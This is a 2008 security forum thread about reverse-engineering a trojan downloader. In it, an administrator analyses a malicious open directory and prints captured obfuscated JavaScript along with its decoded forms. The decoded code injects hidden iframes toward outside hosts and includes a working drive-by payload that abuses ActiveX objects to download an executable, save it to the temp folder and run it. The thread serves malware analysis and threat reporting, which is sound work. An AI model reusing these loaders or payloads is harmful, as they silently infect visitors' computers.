Author Topic: Trojan-Downloader.Win32.Small or Win32/PolyCrypt Reversing  (Read 6771 times)

0 Members and 1 Guest are viewing this topic.

May 16, 2008, 04:40:38 pm
Read 6771 times

Evilcry

  • Special Access
  • Jr. Member

  • Offline
  • *

  • 39
Hi,

just some hour ago I've released a paper on PolyCrypt Reverse Engineering:

http://evilcry.netsons.org/tuts/Trojan-DownloaderWin32Small.pdf

Have a nice Day :)
Evilcry
Deep Root Never Freezes - Tolkien

May 19, 2008, 11:00:39 am
Reply #1

sowhat-x

  • Guest
...he-he,OpenOffice seems to have "chopped" the article...   :)
so I thought I should also link directly to your blog's entry as well:
http://evilcodecave.wordpress.com/2008/05/16/downloaderwin32small-or-win32polycrypt-reversing/

May 19, 2008, 11:32:56 am
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
There's an open dir at;

http://redmed.ru/images/stories/Sport002/

... and a lovely little script one level up (detected by AntiVir as HEUR/HTML.Malware)

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://redmed.ru/images/stories/
Server IP: 67.228.159.64 [ sh3.slavhost.ru ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 May 2008
Time: 12:21:48:21
*****************************************************************
<html>
<body bgcolor="#FFFFFF">
</body>
</html><script>function v47e735f80e942(v47e735f8110cb){ var v47e735f813854=16; return(parseInt(v47e735f8110cb,v47e735f813854));}function v47e735f8177d8(v47e735f81935f){  var v47e735f81ab20='';for(v47e735f81bee1=0; v47e735f81bee1<v47e735f81935f.length; v47e735f81bee1+=2){ v47e735f81ab20+=(String.fromCharCode(v47e735f80e942(v47e735f81935f.substr(v47e735f81bee1, 2))));}return v47e735f81ab20;} document.write(v47e735f8177d8('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D373133343136643234207372633D5C27687474703A2F2F6B697A6164617261692E696E666F2F7570642F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323336323038292B2761335C272077696474683D353138206865696768743D343536207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Decodes to;

Code: [Select]
<SCRIPT>window.status='Done';document.write('<iframe name=713416d24 src=\'http://kizadarai.info/upd/index.php?'+Math.round(Math.random()*236208)+'a3\' width=518 height=456 style=\'display: none\'></iframe>')</SCRIPT>
kizadarai.info doesn't resolve for me though ......

One more level up is detected as HTML/Crypted.Gen;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://redmed.ru/images/
Server IP: 67.228.159.64 [ sh3.slavhost.ru ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 May 2008
Time: 12:25:33:25
*****************************************************************
<html><body bgcolor="#FFFFFF"></body></html><script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,116,121,108,101,61,100,105,115,112,108,97,121,58,110,111,110,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,99,116,114,108,97,108,116,46,105,110,102,111,47,117,112,100,47,105,110,100,101,120,46,112,104,112,63,111,117,116,61,49,49,57,50,54,52,54,50,57,53,34,62,60,47,105,102,114,97,109,101,62));</script><script>function v47e735ea0efa2(v47e735ea114a9){ function v47e735ea136a7 () {return 16;} return(parseInt(v47e735ea114a9,v47e735ea136a7()));}function v47e735ea171fd(v47e735ea199e0){ function v47e735ea20539 () {return 2;} var v47e735ea1d591='';for(v47e735ea1ed64=0; v47e735ea1ed64<v47e735ea199e0.length; v47e735ea1ed64+=v47e735ea20539()){ v47e735ea1d591+=(String.fromCharCode(v47e735ea0efa2(v47e735ea199e0.substr(v47e735ea1ed64, v47e735ea20539()))));}return v47e735ea1d591;} document.write(v47e735ea171fd('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D623135396161207372633D5C27687474703A2F2F6B697A6164617261692E696E666F2F7570642F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3131343932292B27393037645C272077696474683D3532206865696768743D323231207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Also tried sending you to;

Code: [Select]
<SCRIPT>window.status='Done';document.write('<iframe name=b159aa src=\'http://kizadarai.info/upd/index.php?'+Math.round(Math.random()*11492)+'907d\' width=52 height=221 style=\'display: none\'></iframe>')</SCRIPT>
From the open dir;

http://redmed.ru/images/stories/Sport002/kyt.gif = TR/Drop.BHO.QO.2 (tis an executable)
http://redmed.ru/images/stories/Sport002/hot.php = HEUR/HTML.Malware

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://redmed.ru/images/stories/Sport002/hot.php
Server IP: 67.228.159.64 [ sh3.slavhost.ru ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 May 2008
Time: 12:30:01:30
*****************************************************************
<script language=JavaScript>
function diromo(kqac){
var dwma=10,ano=0,ifs=0,kqac="puLb5K_o85prSpAcGyvgtMPg5j_d90vgSSrdXyaojmRLhuw@CBfbuya2s3vok0fik0AgOM"+kqac,sdqx=4+7-dwma+1,soqz=23,siaq=4,mahb=11,mam,bsg=Array(mahb+52,siaq+10,soqz+11,47,53,30,24,18,20,6,0,0,0,0,0,0,54,60,35,9,16,52,5,11,7,46,33,31,41,2,58,8,42,23,57,22,43,29,27,21,3,62,28,0,0,0,0,44,0,45,48,51,55,36,61,37,32,50,15,13,1,19,0,49,10,4,40,38,39,26,12,25,56,59,17),pszc=kqac.length,deaz=392-1,bga=631+deaz,dwv,dpw=0,j;
for(fead=(Math.ceil(pszc/bga))*(sdqx+2),j=fead>>(dwma-8);j>0;j--){dwv='';for(res=Math.min(pszc,bga)*(sdqx+dwma-8),mam=res>>2;mam>0;mam--,pszc--){nmaw=(kqac.charCodeAt(dpw++)-48)*(dwma-6);ifs|=(bsg[nmaw>>2])<<ano;if(ano){dwv+=String.fromCharCode(170^ifs&255);ano-=(dwma-8);ifs>>=(dwma-2)}else{ano=(dwma-4)}}document.write(dwv)};
}diromo("YiZ3ZYCBfbuyk285prpPOcKmZi5jZoqTxEjcvdMHAiM16EtMP2pPOdGBa2OBfiZQAgO2v@GcUoO9RLhPr2pNZoC0fojm_dqiZo6KZ@oBxEucUdmQv@O5jJjVAcH0vo5tUAO2AowBZi1dv2dmOdGVAdjKCi63vdFHRLhPr2pik@OXZoqGahX9RLhPr2QKprSS6@CBfbuykgtMPgFpAcGyvgtMPgOQ_cmT6oqVZoGyAgO1fcvcabl3_hX9C285prS2v@85prSiZo6K_2q3AojKC2mTkdUjUo6BOgtMP2puRbqTfd5Tr2q3AojKC2OKZ@Ot_ckBr25ja@jKC2Mj_c10voOPOdGVAdjKC2VIC285prSSOcFBfo85prpuw@CBfbuya2s3vok0fik0AgOMYiZ3ZYCBfbuyk285prpPOcKmZi5jZoqTOd6BvbFm_EM16EtMP2pifi6TrEUjki6yacQ2O@O9RLhPr2Z3v@puZoG3fgOpk2z5prpPOdGBa2jcfdCXkE7KC2tjZiO9RLhPr2Z3v@pMadUHAbZGAgO112z5prpPOdGBa2X0_ovGZbwKLEUjki6yacl26oO9O2wQv2z5prpPOdGBa2MH_EkXad1KCE5dUbXcabl2OoO9O25B6etMP2pifi6Trd60AiQ2xyO9roF3A@z5prpPOdGBa2vjZdDKC2VIC2z5prpPOdGBa2vdZiOBfgOPO2z5prpPOdGBa21BaEZdAgOpj2z5prpPrEUjki6yacQ2xcO9O26B6hO7v2z5prpPxcZ0UiDXaEQYvdKtvEDGUhX0_ovGZbwHO2vB6hONk2z5prpPrblGUcDyacQpZb7dvE5yZh7dfEOBad1HO2jB6hONk2z5prpPrd60AiQNk@j3ZhOPk2l2roO9RLhPr21BaEZdAg1BaEZdZhO512z5prpPrd60AiQNk@j3ZhOSv2l2O@O9RLhPr2Z3v@p1abZXadq3Ag5BfcGHO2jB6hO2k2z5prpPrc6GkdkTxgpNv@7cUcp9r2Ou12l2rxO9RLhPr2vdZiOBa2QPxcZ0UiDXaEliZcCBv@lpZb7dvE5yZhvdZiOBUhmGvdDykoGHRLh5prpPxbvTrhq3vdXdAi5Qv@qI_@umYiH0A2QiZcCBv@X9fLhPr2p2fc50k@qHRLhPr2QKprpPOdGBa2kBU@GKLcFtAdH0vo5mOcFBfowHj2mTkdUjUo6BxfqY_ojKAcqyU@oBOiHtkiCyZcO5jJZ3_oK0ZetMP2p1vcpp6c6tfiG5CcXdkEX9fLhPr2Z3v@p@acmKvilK_2QPrcFtAdH0vo5m6i60Ai50Ay90Aojm_dM26oOXAcCyk2X9RLhPr2UyAEHBZbHm6@jyfN5yk@XBAd50_hO1_cOuO2UyAEHBZbHBxhz5prpPOdGBa2wjviDTxgp@6i9tfbk9RLhPr2Z3v@p2_dVt_2QP6B1XCNIjCtL0wBz5prpPOdGBa2XHAb6Txgp@xtZ5OtKI5sHIwBz5prpPOdGBa2lQZoXTxgp@xsITRJmpwsTd6etMP2pifi6T6cOyaEp5L2k5rsusIs5i5N61RywiwBz5prpPxLhPr2UyAEHBZbHm6@jyfN5yk@XBAd50_hOs_oGtU@Xyv29sfbOXUhOyf@CHxbljv@l9ZoFjZhkB_d7j6etMP2pNk@mT6EtMP2pifi6TOE5dUbXcabp5L2O2fcGKv2zPOdGBa2vBZiudfb6Txgp26@5B6etMP2puZoG3a2QProF3A@l2xo9B6etMP2pifi6T6d5dvc7BUbp5L2ONviO9L2Z3v@ppvoG3ab1Ga2QPO2GyZoO9RLhPr2Z3v@pMAd1d_@uj_2QP6d1jfoOHAoqs1@j3_djQ1in0Zi5Grbq3A@My_El@adkc_E6HZhO7O2liviCTUdXBUhDyUdljvdMVO2O16etMP2pifi6TObKcZi1VAcp5L2O5v2l26@O9roF3A@l2OsO9RLhPr2Z3v@p9ZoDGUoXGa2QPrc6GkdkHO2Yy3YO9RLhPr2Z3v@pMadUHAbZG_2QPO2RGAcO9L2Z3v@ppacv0A@vca2QPO29Vv2z5prpPOdGBa2mXZ@KtAEGTxgp2xNuTaoO9L2Z3v@pMf@9cZ@F0a2QPO2XtAiO9L2Z3v@pSZdHm_@XGa2QPO25jZoqB6etMP2pifi6TxoGjAiwcZip5L2UyAEHBZbHm6N60Ai50ZROXAcCyahDyUdljvdMHrE1cAcVcvdl2OJO9xEntfdCjfilMf@9cZ@F0UhFdfoqTfb7VO2O16etMP2pifi6T6@XdZiMyvdp5L2UyAEHBZbHm6N60Ai50ZROXAcCyahn0kcCy_ojHO2q26hlQvE7QAb7VO2O16etMP2psfbkt_b1ckJFTfcqGO2a0I0OuO2MyadO9O2uXwJO9O2F2fc1Kv2l2xc1mO@KQxbHB6hOIZcO9O2jtUJwyUo6jAcwQ6YuQv@5TLs6SO2l2O2l26cFBfbqPabuQRiQMAd1d_@ujv29iAi9tfcX9RLhPr2wjZcCG_cZm6@jm_cM16etMP2pMAd1d_@ujvJ5ja@jTxgpIwetMP2pMAd1d_@ujvJFTfcqGxhz5prpPObKyZcuTfbq@j@XyfcMsfbkt_b1ckJ60Z@uQvow0vNFyAEX9RLhPr2D3aovtUoKTxgp2rbq3A@My_EO9O2qY_EjB6etMP2pifi6T6d6Gv@njvip5L2UyAEHBZbHm6N60Ai50ZROXAcCyahOsKi6j_@5jvokmOyXVAcRjU@50AogBvbjt_dOuO2O1xLhPr2D3aovtUoKTxgp@k@MBkbXBvJr0fb9y_YGyabM@k@MBkbXBvJa0_dRTfcCjAi9c5o9yAc6GOsXuOEVVvcwQAdX9RLhPr2n0ackTa@Xm6YGcfcYQvyXVAcMMf@9cZ@F0aJ616etMP2p5AiX3Z@vtvJRGAc9VAy70ZiKyfcMMf@9cZ@F0fhz5prpPx4tMP2psAi5t_bMYAhzKfLhPr2QKprQKprSS6@CBfbuykgtMPgF2Zo1jkgtMPgFp_dHVvgtMPg2y0RsmRLhuLx33Iy85prSN0xYVYy875o5TOyF0ko1VwJYjI0s01gtMPgFpYyTy1gtMP0M0_260A@K0Z@50_cpYjYsT6dGta2qQ_dpiZoKm_cpSvopNabXta2w0v@Z0v@q5prS2v@8uCi6mLg2B32qQZ@M3_cjKC2qQZ@M3_cjBOgtMNNu3ZiM0ZJV76sqsRsps0c6cfc6Txi5TrYFBadppLstMPgF25RIjjgtMPgFpI0tV1g");
</script>

Decoded;

Code: [Select]
<html>
<head>
<title></title>
<script Language="JavaScript">
  function yefvhka(){
   var bravo="bravo";
   document.forms["ypvwyor"].elements["bmsbcdg"].value=bravo;
   vrbjonx();
  }
</script>
</head>
<body onload="yefvhka();">
<br>
<form name="ypvwyor">
  <input  name="bmsbcdg" type="hidden" value="11">
</form>
 <script Language="JavaScript">
  function vrbjonx(){
  var xwybrtd="r";
  var loaq="x";
  var evuczzx="Mic";
  var ztwkivh="I";
  var ielfhks=xwybrtd+"o"+"so";
  var hkxgztd=ztwkivh+"n"+"t";
  var trea="E"+loaq;
  var fiwz="11";
  var fgcbr=" ";
  var drxvg="X";
  xwybrtd="e"+"r"+"n";
  evuczzx=evuczzx+ielfhks+"f"+"t";
  hkxgztd=hkxgztd+xwybrtd+"e"+"t";
  trea=trea+"p"+"l";
  drxvg=drxvg+"M";
  trea=trea+"o"+"r";
  var yhvztna=trea+"e"+"r";
  drxvg = drxvg + "L"+"H";
  fgcbr = evuczzx+fgcbr+hkxgztd+fgcbr+yhvztna;

  if (navigator.appName!=fgcbr){
   return;
  }
  var grsa=document.forms["ypvwyor"].elements["bmsbcdg"].value;
  if (grsa!=fiwz){
  var wdymbkm = document.createElement("object");
  wdymbkm.setAttribute("id","wdymbkm");
  var sibz = 'clsi';
  var btqc = 'd:BD96C5';
  var ikir = '56-65A3-1';
  var kooi = '1D0-983A';
  var gbtx = '-00C04FC29E36';
 
  wdymbkm.setAttribute("classid",sibz+btqc+ikir+kooi+gbtx);
  try {
  var ztwkivh = "ream"; var fbcpwir = "st";
  loaq = loaq+"ml";
  var wtgfxrk = "db"; var hnaqhdx = "ado";
  var judgppi = wdymbkm.CreateObject(hnaqhdx+wtgfxrk+"."+fbcpwir+ztwkivh,"");
  var jufcdle = "m"+"s"+loaq+"2";

  var kozxoix = drxvg+"TTP";
  var ztwkivh = "She"; var xdfeqfv = "ll";
  var yjsucya = "Appl"; var zqlfsou = "ica"; var owmnpix = "tion";
  var maiasfc = wdymbkm.CreateObject(ztwkivh+xdfeqfv+"."+yjsucya+zqlfsou+owmnpix,"");
  var sigchdv = wdymbkm.CreateObject(jufcdle+"."+kozxoix,"");
  sigchdv.open("GET","htt"+"p:/"+"/redm"+"ed.ru/im"+"ag"+"es/stories/Sport002/"+""+"gori.php?a=judgppi",false);
  sigchdv.send();
  judgppi.type = 1;
  judgppi.open();
  judgppi.Write(sigchdv.responseBody);
  zqlfsou = "hnaqhdx"+".exe";
  var wrhrjib = wdymbkm.CreateObject("Scripting.FileSystemObject","")
  zqlfsou = wrhrjib.BuildPath(wrhrjib.GetSpecialFolder(2),zqlfsou);
  judgppi.SaveToFile(zqlfsou,2);
  maiasfc.ShellExecute(zqlfsou);
  }
  catch(e){}
  }
}
</script>
</body>
</html>
<HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
The requested URL was not found on this server.
<br><br><HR noshade="noshade">
Apache/1.3.31 Server at Port 80
</BODY>
</HTML>

http://redmed.ru/images/stories/Sport002/lib/lib.csource.php

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://redmed.ru/images/stories/Sport002/lib/lib.csource.php
Server IP: 67.228.159.64 [ sh3.slavhost.ru ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 May 2008
Time: 12:31:42:31
*****************************************************************
<script language=JavaScript>
function diromo(kqac){
var dwma=10,ano=0,ifs=0,kqac="vx"+kqac,sdqx=4+7-dwma+1,soqz=5,siaq=12,mahb=10,mam,bsg=Array(mahb+53,siaq+47,soqz+12,28,5,46,7,8,15,52,0,0,0,0,0,0,60,13,35,53,6,56,42,41,51,30,54,25,4,49,38,31,1,32,3,29,19,58,47,27,50,55,21,0,0,0,0,22,0,0,24,43,45,26,57,62,11,61,18,48,33,9,14,16,36,37,39,20,34,12,10,44,2,23,40),pszc=kqac.length,deaz=527-1,bga=496+deaz,dwv,dpw=0,j;
for(fead=(Math.ceil(pszc/bga))*(sdqx+2),j=fead>>(dwma-8);j>0;j--){dwv='';for(res=Math.min(pszc,bga)*(sdqx+dwma-8),mam=res>>2;mam>0;mam--,pszc--){nmaw=(kqac.charCodeAt(dpw++)-48)*(dwma-6);ifs|=(bsg[nmaw>>2])<<ano;if(ano){dwv+=String.fromCharCode(170^ifs&255);ano-=(dwma-8);ifs>>=(dwma-2)}else{ano=(dwma-4)}}document.write(dwv)};
}diromo("");
</script>

Wouldn't decode for some reason?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2008, 03:20:08 pm
Reply #3

Evilcry

  • Special Access
  • Jr. Member

  • Offline
  • *

  • 39
Hi,

Quote
OpenOffice seems to have "chopped" the article...   Smiley
so I thought I should also link directly to your blog's entry as well:

eheh this is an Anti-Warez protection of Altervista, if the request does not come from Altervista
the http request is dropped ;)

Thank you for the signalation MysteryFCM, I'll investigate deeply ;)

Regards,
Evilcry
Deep Root Never Freezes - Tolkien